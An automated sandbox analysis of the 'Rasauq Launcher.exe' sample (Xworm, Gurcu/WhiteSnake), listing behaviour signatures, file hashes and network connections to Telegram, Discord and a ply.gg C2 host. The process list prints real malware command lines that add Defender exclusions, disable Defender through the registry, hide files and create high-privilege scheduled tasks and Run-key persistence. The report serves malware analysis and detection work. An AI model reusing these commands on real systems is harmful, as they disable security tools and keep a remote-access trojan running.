Analysis Overview
SHA256
9fc53dcefce749b23c8f907dc44d498d15058a5b2cedb7c94e1cd42c88176c2f
Threat Level: Known bad
The file Rasauq Launcher.exe was found to be: Known bad.
Malicious Activity Summary
Xworm
Xworm family
Modifies security service
Gurcu, WhiteSnake
Contains code to disable Windows Defender
Gurcu family
Detect Xworm Payload
Modifies Windows Defender DisableAntiSpyware settings
Disables service(s)
Modifies boot configuration data using bcdedit
Possible privilege escalation attempt
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Modifies Windows Firewall
Drops file in Drivers directory
Sets file to hidden
Manipulates Digital Signatures
Command and Scripting Interpreter: PowerShell
Disables RegEdit via registry modification
Checks computer location settings
Executes dropped EXE
Drops startup file
Loads dropped DLL
Modifies file permissions
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Power Settings
Drops file in System32 directory
Sets desktop wallpaper using registry
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Delays execution with timeout.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Checks processor information in registry
Kills process with taskkill
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-20 10:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-20 10:39
Reported
2025-03-20 10:42
Platform
win7-20241010-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe"
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
"C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Launch.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"
C:\Windows\System32\attrib.exe
"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\system32\schtasks.exe
"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
C:\Windows\system32\schtasks.exe
"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
C:\Windows\system32\taskeng.exe
taskeng.exe {CAE06032-FC22-4ED6-80A7-81342CA70EB4} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | looking-brings.gl.at.ply.gg | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | tcp |
Files
memory/2868-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp
memory/2868-1-0x000000013F7B0000-0x000000013F7C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
| MD5 | 12a225de8199d2a31f049a6f300d8cfa |
| SHA1 | 24819a452cf1db15167a52b12f258d27baacbd6e |
| SHA256 | 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801 |
| SHA512 | 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32 |
C:\Users\Admin\AppData\Local\Temp\Launch.bat
| MD5 | 41bded52aa489cdea31a174f89bca818 |
| SHA1 | da072fb11e72d2762f96d0f901d7ef7bca17218d |
| SHA256 | 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59 |
| SHA512 | d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9 |
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
| MD5 | 7091469b8f2213255ba3c2870a60c7eb |
| SHA1 | 17e501e4900bf5dacc5cb0424db87d2ce7a89880 |
| SHA256 | d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7 |
| SHA512 | f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8 |
memory/2060-20-0x0000000000BD0000-0x0000000000BEA000-memory.dmp
memory/2204-22-0x000000013FBF0000-0x000000013FBFE000-memory.dmp
memory/2868-24-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp
memory/2060-25-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp
memory/2756-30-0x000000001B310000-0x000000001B5F2000-memory.dmp
memory/2756-31-0x0000000001E50000-0x0000000001E58000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 23f38ac0f2cdb8126c995b081a3b3918 |
| SHA1 | 614d4328dcf6206c9ee9a0b33887fadf8f7a594d |
| SHA256 | 381083c072e1be62f9facb85c4c9f018dfb44a5c279f60c2bcd62c6cc149feaa |
| SHA512 | 4d607de53850331f31b27344999b6d8fe9d9c6072171ec1a10d7e0ee141e5e1aa0de4d1cbc609af95f223e6bdb40ed7c4016c540674096e4503d9524fb2edcf4 |
memory/2988-37-0x000000001B1F0000-0x000000001B4D2000-memory.dmp
memory/2988-38-0x0000000001F90000-0x0000000001F98000-memory.dmp
memory/2060-51-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpC4C5.tmp.bat
| MD5 | 458e649b3b89a944fea622defdc5b421 |
| SHA1 | a953579dc1a96e82e9226715f4df44495916e20d |
| SHA256 | dbe59a4cdaab22206b48ec77a5694c2aec8bb61608a5131fd530b0990d7e9bf4 |
| SHA512 | 9b7207530ab99f53b1303706d15573c445f493e1fb66720ea663a237fa4a5ec88e60c513db5764f122dbc23a2034069f787ecf40bc97ee66dc041517c30ff14f |
memory/1712-66-0x000000013F0C0000-0x000000013F0CE000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-20 10:39
Reported
2025-03-20 10:42
Platform
win10v2004-20250314-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Disables service(s)
Gurcu family
Gurcu, WhiteSnake
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Xworm
Xworm family
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\ | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\System32\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr" | C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Service | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\"" | C:\Windows\system32\reg.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Rasauq\$77RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File created | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\$666-RasauqBroker.bat | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\system32\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\system32\ReAgentc.exe | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003 | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002 | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\powercfg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\system32\powercfg.exe | N/A |
